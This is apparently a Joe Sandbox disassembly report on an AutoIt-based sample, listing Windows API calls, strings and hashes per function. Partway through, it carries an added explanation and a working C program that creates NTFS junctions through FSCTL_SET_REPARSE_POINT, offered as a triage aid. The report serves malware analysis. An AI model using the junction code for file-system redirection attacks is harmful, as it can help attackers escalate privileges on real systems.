                                                                          • Part of subcall function 00E7B337: _wcscpy.LIBCMT ref: 00E7B36F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                        • API String ID: 2258743419-1018226102
                                                                        • Opcode ID: 8efaf5dbaa684a99fc99afda364678ba436ab9872bc84b0df931163c7cc30f97
                                                                        • Instruction ID: 6dc0f5bd637cdb92c0508b1395dad522642b5286cbc80d302157ae9a99dcd46f
                                                                        • Opcode Fuzzy Hash: 8efaf5dbaa684a99fc99afda364678ba436ab9872bc84b0df931163c7cc30f97
                                                                        • Instruction Fuzzy Hash: A912A0715083459FC724EF24C881AAFBBE9BF89304F10591EF599A32A1DB30DA49DB53
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EDCEFB
                                                                        • DestroyWindow.USER32(?,?), ref: 00EDCF73
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EDCFF4
                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EDD016
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EDD025
                                                                        • DestroyWindow.USER32(?), ref: 00EDD042
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E70000,00000000), ref: 00EDD075
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EDD094
                                                                        • GetDesktopWindow.USER32 ref: 00EDD0A9
                                                                        • GetWindowRect.USER32(00000000), ref: 00EDD0B0
                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EDD0C2
                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EDD0DA
                                                                          • Part of subcall function 00E8B526: GetWindowLongW.USER32(?,000000EB), ref: 00E8B537
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                        • String ID: 0$tooltips_class32
                                                                        • API String ID: 3877571568-3619404913
                                                                        • Opcode ID: d591a7852caf669ad9292b7ed0be87d71a21c71cd2eec549082d0d594a80d4bc
                                                                        • Instruction ID: 6995cd20a1c5e9dbe0f501e7f2267338bb8455b8bc8195cdf55fbcea4365807b
                                                                        • Opcode Fuzzy Hash: d591a7852caf669ad9292b7ed0be87d71a21c71cd2eec549082d0d594a80d4bc
                                                                        • Instruction Fuzzy Hash: A6719C70148205AFD720CF68CC85FAA7BEAFB88708F14551AF985A73A1D770E946DB12
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00EDF37A
                                                                          • Part of subcall function 00EDD7DE: ClientToScreen.USER32(?,?), ref: 00EDD807
                                                                          • Part of subcall function 00EDD7DE: GetWindowRect.USER32(?,?), ref: 00EDD87D
                                                                          • Part of subcall function 00EDD7DE: PtInRect.USER32(?,?,00EDED5A), ref: 00EDD88D
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00EDF3E3
                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EDF3EE
                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EDF411
                                                                        • _wcscat.LIBCMT ref: 00EDF441
                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EDF458
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00EDF471
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00EDF488
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00EDF4AA
                                                                        • DragFinish.SHELL32(?), ref: 00EDF4B1
                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EDF59C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                        • API String ID: 169749273-3440237614
                                                                        • Opcode ID: 88bcbead4493a1939c541aaedf26b7f22b27bdea1eafb3f979d43cd779aee598
                                                                        • Instruction ID: a720745cf8cc8c51b88e446daacdd43d392e827fe047f95142bdb68a9768e6f1
                                                                        • Opcode Fuzzy Hash: 88bcbead4493a1939c541aaedf26b7f22b27bdea1eafb3f979d43cd779aee598
                                                                        • Instruction Fuzzy Hash: 7E614971108300AFC311EF64DC45DABBBE9FF89710F404A1EF699A21A1DB709A0ACB52
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00EE3973,00000016,0000138C,00000016,?,00000016,00F0DDB4,00000000,?), ref: 00EB26F1
                                                                        • LoadStringW.USER32(00000000,?,00EE3973,00000016), ref: 00EB26FA
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00EE3973,00000016,0000138C,00000016,?,00000016,00F0DDB4,00000000,?,00000016), ref: 00EB271C
                                                                        • LoadStringW.USER32(00000000,?,00EE3973,00000016), ref: 00EB271F
                                                                        • __swprintf.LIBCMT ref: 00EB276F
                                                                        • __swprintf.LIBCMT ref: 00EB2780
                                                                        • _wprintf.LIBCMT ref: 00EB2829
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EB2840
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR$s9
                                                                        • API String ID: 618562835-2846937808
                                                                        • Opcode ID: f8bcc3dc6aa673b090367ccd0d91e7c159ab7b12bdc25d3cbc572455377e7eb0
                                                                        • Instruction ID: 448d836073cf53342fa88370af5d79cdf2b00a901b8e648cbdee42a7e14322dc
                                                                        • Opcode Fuzzy Hash: f8bcc3dc6aa673b090367ccd0d91e7c159ab7b12bdc25d3cbc572455377e7eb0
                                                                        • Instruction Fuzzy Hash: 16417E72800219AACF14FBD0DD82EEFB7BCAF15340F505069B60972092EB74AF09DB61
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(00000000), ref: 00EBAB3D
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00EBAB46
                                                                        • VariantClear.OLEAUT32(?), ref: 00EBAB52
                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00EBAC40
                                                                        • __swprintf.LIBCMT ref: 00EBAC70
                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00EBAC9C
                                                                        • VariantInit.OLEAUT32(?), ref: 00EBAD4D
                                                                        • SysFreeString.OLEAUT32(00000016), ref: 00EBADDF
                                                                        • VariantClear.OLEAUT32(?), ref: 00EBAE35
                                                                        • VariantClear.OLEAUT32(?), ref: 00EBAE44
                                                                        • VariantInit.OLEAUT32(00000000), ref: 00EBAE80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                        • API String ID: 3730832054-3931177956
                                                                        • Opcode ID: d6e4762b1ddf96cc1bd521e0709e145e9091c6e96d7ce173a06a78fbcf91981f
                                                                        • Instruction ID: 45f8db0e0de222b6efa95d400c2e77bf01b9ea21992a7dbb554a1c592e0fb8a6
                                                                        • Opcode Fuzzy Hash: d6e4762b1ddf96cc1bd521e0709e145e9091c6e96d7ce173a06a78fbcf91981f
                                                                        • Instruction Fuzzy Hash: BCD1BE72604615DBDF209FA9D885BEBF7B6FF04700F189466E429BB181DB70E840DB92
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 00ED71FC
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00ED7247
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharMessageSendUpper
                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                        • API String ID: 3974292440-4258414348
                                                                        • Opcode ID: bcdcc4f259bfa571d350e9245b068a2aca0a6cd6b00ee39b48e8ca568e165d1c
                                                                        • Instruction ID: d16c0fafded566d3e4a0887dfe131596c86c2fb7714df133c5ea290ffb5f3dfd
                                                                        • Opcode Fuzzy Hash: bcdcc4f259bfa571d350e9245b068a2aca0a6cd6b00ee39b48e8ca568e165d1c
                                                                        • Instruction Fuzzy Hash: 4C915F702086419FCB05EF10C851A6EB7E1EF95314F10A859F99A7B3A3DB70ED4ADB81
                                                                        APIs
                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EDE5AB
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00ED9808,?), ref: 00EDE607
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EDE647
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EDE68C
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EDE6C3
                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,00ED9808,?), ref: 00EDE6CF
                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EDE6DF
                                                                        • DestroyIcon.USER32(?), ref: 00EDE6EE
                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EDE70B
                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EDE717
                                                                          • Part of subcall function 00E90FA7: __wcsicmp_l.LIBCMT ref: 00E91030
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                        • String ID: .dll$.exe$.icl
                                                                        • API String ID: 1212759294-1154884017
                                                                        • Opcode ID: d1c7d871f4892dbb17579f2e28f7caf2bcbc629fd1e60c00ba35d7e1c5c19aed
                                                                        • Instruction ID: 7fecb9f9aba863632e50d2fb803acb280503fc0297a9338b8f71047c4eb126e5
                                                                        • Opcode Fuzzy Hash: d1c7d871f4892dbb17579f2e28f7caf2bcbc629fd1e60c00ba35d7e1c5c19aed
                                                                        • Instruction Fuzzy Hash: 7361AF71500215FEEB14AF64DC4ABBE7BA8FB18724F105106F925FA2D1EB70E985CB60
                                                                        APIs
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • CharLowerBuffW.USER32(?,?), ref: 00EBD292
                                                                        • GetDriveTypeW.KERNEL32 ref: 00EBD2DF
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EBD327
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EBD35E
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EBD38C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                        • API String ID: 1148790751-4113822522
                                                                        • Opcode ID: 28f143b45f3448783dfaa69b6f3c0ed1598e362ffdbcdb51e7b48c3cb2bd10ec
                                                                        • Instruction ID: 3fabe54d56d4b799fd65794876848c7cab360676a709ee705fbd257c49f3a692
                                                                        • Opcode Fuzzy Hash: 28f143b45f3448783dfaa69b6f3c0ed1598e362ffdbcdb51e7b48c3cb2bd10ec
                                                                        • Instruction Fuzzy Hash: 8E512C715087059FC700EF10D8819AEB7E8EF98758F10986DF89977262DB35EE06CB92
                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EBD0D8
                                                                        • __swprintf.LIBCMT ref: 00EBD0FA
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EBD137
                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EBD15C
                                                                        • _memset.LIBCMT ref: 00EBD17B
                                                                        • _wcsncpy.LIBCMT ref: 00EBD1B7
                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EBD1EC
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EBD1F7
                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00EBD200
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EBD20A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                        • String ID: :$\$\??\%s
                                                                        • API String ID: 2733774712-3457252023
                                                                        • Opcode ID: 1534a9c1577d97c89a79c9a12991b5c62508ba752cba04fb60dad59e0136c9e5
                                                                        • Instruction ID: dd480d5307a212573729259626b4952ae798e5cfa2603b0e87958f3ada23408b
                                                                        • Opcode Fuzzy Hash: 1534a9c1577d97c89a79c9a12991b5c62508ba752cba04fb60dad59e0136c9e5
                                                                        • Instruction Fuzzy Hash: 96318DB290411AABDB21DFA5DC49FEF77BDEF89704F1040B6F609E2160E77096458B24
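The CreateFileW / DeviceIoControl pair in the function above is the standard sequence for creating an NTFS junction: the directory is opened with GENERIC_WRITE (0x40000000), OPEN_EXISTING (3) and dwFlagsAndAttributes 0x02200000, which is FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, and the handle then receives IOCTL 0x000900A4, which decodes to FSCTL_SET_REPARSE_POINT; the "\??\%s" format string is the NT-namespace substitute name written into the reparse buffer, and RemoveDirectoryW on the error path undoes the CreateDirectoryW. The C below is an added example written for this listing, not code from the sample or from the AutoIt runtime it embeds: it decodes those two constants, serializes the mount-point REPARSE_DATA_BUFFER from the documented layout (hand-packed so it is correct even where wchar_t is 4 bytes), and, under _WIN32 only, issues the same call sequence. The link path, target path and helper names are illustrative. Note that a function being present in the interpreter image does not show that this particular script calls it; the dynamic sections of the report are what establish that.

```c
/* Added example (not from the report or the AutoIt runtime): what the
 * CreateFileW(0x40000000, ..., 3, 0x02200000) + DeviceIoControl(0x000900A4)
 * sequence does, i.e. create an NTFS junction (mount-point reparse point).
 * Buffer layout and tag values follow the documented REPARSE_DATA_BUFFER. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define FSCTL_SET_REPARSE_POINT_CODE 0x000900A4u
#define IO_REPARSE_TAG_MOUNT_POINT   0xA0000003u
#define FLAG_BACKUP_SEMANTICS        0x02000000u  /* FILE_FLAG_BACKUP_SEMANTICS   */
#define FLAG_OPEN_REPARSE_POINT      0x00200000u  /* FILE_FLAG_OPEN_REPARSE_POINT */
#define NT_PREFIX                    "\\??\\"     /* the "\??\%s" string above     */
#define REPARSE_HDR 8      /* ReparseTag(4) ReparseDataLength(2) Reserved(2)       */
#define MOUNT_HDR   8      /* SubstituteName/PrintName Offset+Length, 2 bytes each */
#define MAX_REPARSE 16384  /* MAXIMUM_REPARSE_DATA_BUFFER_SIZE                     */

/* CTL_CODE(DeviceType, Function, Method, Access) packs as
 * (DeviceType << 16) | (Access << 14) | (Function << 2) | Method. */
struct ioctl_parts { unsigned device_type, function, method, access; };

struct ioctl_parts decode_ioctl(uint32_t code) {
    struct ioctl_parts p;
    p.device_type = (code >> 16) & 0xFFFF;  /* 9  = FILE_DEVICE_FILE_SYSTEM */
    p.function    = (code >> 2)  & 0xFFF;   /* 41 = SET_REPARSE_POINT       */
    p.method      =  code        & 0x3;     /* 0  = METHOD_BUFFERED         */
    p.access      = (code >> 14) & 0x3;     /* 0  = FILE_ANY_ACCESS         */
    return p;
}

/* A directory handle can only receive a reparse point when opened with
 * both flags; the listing's 0x02200000 is exactly that combination. */
int opens_dir_for_reparse(uint32_t flags_and_attrs) {
    const uint32_t need = FLAG_BACKUP_SEMANTICS | FLAG_OPEN_REPARSE_POINT;
    return (flags_and_attrs & need) == need;
}

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)v); put16(p + 2, (uint16_t)(v >> 16)); }

/* Serializes a mount-point REPARSE_DATA_BUFFER for an ASCII target such as
 * "C:\Windows": substitute name "\??\C:\Windows", print name "C:\Windows",
 * both UTF-16LE and NUL-terminated. Returns the total size, 0 if it does not fit. */
size_t build_junction_buffer(const char *target, uint8_t *out, size_t out_cap) {
    size_t tlen = strlen(target), plen = strlen(NT_PREFIX);
    size_t sub_bytes = (plen + tlen) * 2, prn_bytes = tlen * 2;
    size_t path_bytes = sub_bytes + 2 + prn_bytes + 2;   /* + two NUL terminators */
    size_t total = REPARSE_HDR + MOUNT_HDR + path_bytes;
    if (total > out_cap || total > MAX_REPARSE) return 0;
    memset(out, 0, total);
    put32(out + 0, IO_REPARSE_TAG_MOUNT_POINT);
    put16(out + 4, (uint16_t)(MOUNT_HDR + path_bytes)); /* length after the 8-byte header */
    put16(out + 8, 0);                                  /* SubstituteNameOffset */
    put16(out + 10, (uint16_t)sub_bytes);               /* SubstituteNameLength */
    put16(out + 12, (uint16_t)(sub_bytes + 2));         /* PrintNameOffset      */
    put16(out + 14, (uint16_t)prn_bytes);               /* PrintNameLength      */
    uint8_t *path = out + REPARSE_HDR + MOUNT_HDR;
    for (size_t i = 0; i < plen; i++) put16(path + 2 * i, (uint8_t)NT_PREFIX[i]);
    for (size_t i = 0; i < tlen; i++) put16(path + 2 * (plen + i), (uint8_t)target[i]);
    path += sub_bytes + 2;
    for (size_t i = 0; i < tlen; i++) put16(path + 2 * i, (uint8_t)target[i]);
    return total;
}

/* Byte at idx of the buffer built for target, or -1; used to check the layout. */
int junction_buffer_byte(const char *target, size_t idx) {
    uint8_t buf[MAX_REPARSE];
    size_t n = build_junction_buffer(target, buf, sizeof buf);
    return (n && idx < n) ? buf[idx] : -1;
}

#ifdef _WIN32
#include <windows.h>
/* Same order as the listing: CreateDirectoryW, CreateFileW, DeviceIoControl,
 * CloseHandle, and RemoveDirectoryW to undo the directory on failure. */
int create_junction(const wchar_t *link_dir, const char *target_ascii) {
    uint8_t buf[MAX_REPARSE];
    size_t n = build_junction_buffer(target_ascii, buf, sizeof buf);
    if (!n || !CreateDirectoryW(link_dir, NULL)) return 0;
    HANDLE h = CreateFileW(link_dir, GENERIC_WRITE, 0, NULL, OPEN_EXISTING,
                           FLAG_BACKUP_SEMANTICS | FLAG_OPEN_REPARSE_POINT, NULL);
    if (h == INVALID_HANDLE_VALUE) { RemoveDirectoryW(link_dir); return 0; }
    DWORD ret = 0;
    BOOL ok = DeviceIoControl(h, FSCTL_SET_REPARSE_POINT_CODE, buf, (DWORD)n,
                              NULL, 0, &ret, NULL);
    CloseHandle(h);
    if (!ok) RemoveDirectoryW(link_dir);
    return ok ? 1 : 0;
}
#endif

int main(void) {
    struct ioctl_parts p = decode_ioctl(FSCTL_SET_REPARSE_POINT_CODE);
    printf("0x%08X -> device %u, function %u, method %u\n",
           FSCTL_SET_REPARSE_POINT_CODE, p.device_type, p.function, p.method);
    uint8_t buf[256];
    size_t n = build_junction_buffer("C:\\Windows", buf, sizeof buf);
    for (size_t i = 0; i < n; i++) printf("%02X%c", buf[i], (i % 16 == 15) ? '\n' : ' ');
    putchar('\n');
    return 0;
}
```

For "C:\Windows" the buffer is 68 bytes: tag 03 00 00 A0, ReparseDataLength 60, substitute name at PathBuffer offset 0 (28 bytes), print name at offset 30 (20 bytes). When triaging a trace like the one above, the combination of 0x02200000 in CreateFileW and 0x000900A4 in DeviceIoControl is the thing to key on; the "\??\" prefix confirms the substitute name is being written in NT form, which is what junctions require.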
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                        • String ID:
                                                                        • API String ID: 884005220-0
                                                                        • Opcode ID: 8343e768c75d97c8afb902ff04620a683ed306e31ca6b5d84fbe8ca6a136da52
                                                                        • Instruction ID: 3da4f6ac3b51e7635edfe5f11ad49f93b6621482fad0fe932136e4d6f4a3d6bc
                                                                        • Opcode Fuzzy Hash: 8343e768c75d97c8afb902ff04620a683ed306e31ca6b5d84fbe8ca6a136da52
                                                                        • Instruction Fuzzy Hash: 22611132900306AFDB296F24DE417BA77E8EF4A724F602166E845BF180DF38ED40D691
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00EDE754
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00EDE76B
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00EDE776
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EDE783
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EDE78C
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00EDE79B
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EDE7A4
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EDE7AB
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00EDE7BC
